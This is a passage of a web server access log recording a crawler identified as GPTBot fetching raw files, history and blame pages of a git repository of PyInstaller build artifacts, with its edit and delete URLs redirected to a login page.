74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/PYZ-00.pyz" -[17/Feb/2026:18:50:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/build/AssetPilot/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs" -[17/Feb/2026:18:50:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/build/AssetPilot/localpycs" -[17/Feb/2026:18:50:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/EXE-00.toc" -[17/Feb/2026:18:50:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/EXE-00.toc" -[17/Feb/2026:18:50:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/EXE-00.toc" -[17/Feb/2026:18:50:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/EXE-00.toc" -[17/Feb/2026:18:50:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/AssetPilot.pkg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/AssetPilot.pkg" -[17/Feb/2026:18:50:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/AssetPilot.pkg" -[17/Feb/2026:18:50:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" -[17/Feb/2026:18:50:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" -[17/Feb/2026:18:50:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/AssetPilot.pkg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/AssetPilot.pkg" -[17/Feb/2026:18:50:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/AssetPilot.pkg" -[17/Feb/2026:18:50:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" -[17/Feb/2026:18:50:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" -[17/Feb/2026:18:50:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/build/AssetPilot/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs" -[17/Feb/2026:18:50:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/build/AssetPilot/localpycs" -[17/Feb/2026:18:50:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 11145] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs" -[17/Feb/2026:18:50:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html" [Client 74.7.227.38] [Length 904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html" -[17/Feb/2026:18:50:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html" [Client 74.7.227.38] [Length 863930] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html" -[17/Feb/2026:18:50:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html?display=source" [Client 74.7.227.38] [Length 526385] [Gzip 19.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html" -[17/Feb/2026:18:50:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" [Client 74.7.227.38] [Length 800279] [Gzip 27.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" -[17/Feb/2026:18:50:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" [Client 74.7.227.38] [Length 908] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" -[17/Feb/2026:18:50:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html?display=rendered" [Client 74.7.227.38] [Length 11174] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" -[17/Feb/2026:18:50:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html" [Client 74.7.227.38] [Length 9810] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html" -[17/Feb/2026:18:50:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html" [Client 74.7.227.38] [Length 806161] [Gzip 27.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html" -[17/Feb/2026:18:50:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html?display=source" [Client 74.7.227.38] [Length 522623] [Gzip 19.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" -[17/Feb/2026:18:50:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html?display=rendered" [Client 74.7.227.38] [Length 11175] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/xref-AssetPilot.html" -[17/Feb/2026:18:50:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:50:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:50:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9826] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:50:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:50:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:50:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:50:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:18:50:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" [Client 74.7.227.38] [Length 858166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" -[17/Feb/2026:18:50:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" [Client 74.7.227.38] [Length 9813] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/xref-GoldMonitor.html" -[17/Feb/2026:18:50:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 11147] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs" -[17/Feb/2026:18:50:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 11145] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs" -[17/Feb/2026:18:50:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 11146] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs" -[17/Feb/2026:18:50:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/AssetPilot.pkg" [Client 74.7.227.38] [Length 44615970] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/AssetPilot.pkg" -[17/Feb/2026:18:50:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/AssetPilot/AssetPilot.pkg" [Client 74.7.227.38] [Length 892] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/AssetPilot.pkg" -[17/Feb/2026:18:50:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/AssetPilot/AssetPilot.pkg" [Client 74.7.227.38] [Length 9811] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/AssetPilot.pkg" -[17/Feb/2026:18:50:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/AssetPilot/EXE-00.toc" [Client 74.7.227.38] [Length 884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/EXE-00.toc" -[17/Feb/2026:18:50:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/EXE-00.toc" [Client 74.7.227.38] [Length 33418] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/EXE-00.toc" -[17/Feb/2026:18:50:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/AssetPilot/PYZ-00.pyz" [Client 74.7.227.38] [Length 884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.pyz" -[17/Feb/2026:18:50:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/PYZ-00.pyz" [Client 74.7.227.38] [Length 4613369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/PYZ-00.pyz" -[17/Feb/2026:18:50:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz" [Client 74.7.227.38] [Length 4587481] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz" -[17/Feb/2026:18:50:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:50:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:50:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:50:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 928] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:50:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9826] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:50:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9828] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:18:50:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:50:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:18:50:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz" -[17/Feb/2026:18:50:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/build/AssetPilot/EXE-00.toc" [Client 74.7.227.38] [Length 28375] [Gzip 20.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/EXE-00.toc" -[17/Feb/2026:18:50:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9830] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:18:50:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr 